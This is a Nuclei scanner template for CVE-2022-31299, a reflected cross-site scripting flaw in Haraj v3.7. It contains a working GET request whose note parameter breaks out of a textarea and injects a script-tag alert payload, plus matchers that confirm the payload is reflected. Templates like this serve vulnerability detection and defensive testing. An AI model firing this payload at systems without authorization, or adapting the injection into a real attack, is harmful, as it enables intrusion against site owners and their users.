nuclei-templates/cves/2022/CVE-2022-31299.yaml

37 lines
1.0 KiB
YAML
Raw Normal View History

2022-09-15 11:58:57 +00:00
id: CVE-2022-31299
info:
name: Haraj v3.7 - Reflected XSS
author: edoardottt
severity: medium
description: Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-31299
- https://github.com/bigzooooz/CVE-2022-31299
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-31299
cwe-id: CWE-79
tags: cve,cve2022,haraj,xss
requests:
- method: GET
path:
- "{{BaseURL}}/harajnext/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(String.fromCharCode(98,52,122,98,48,122))%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "<script>alert(String.fromCharCode(98,52,122,98,48,122))</script>"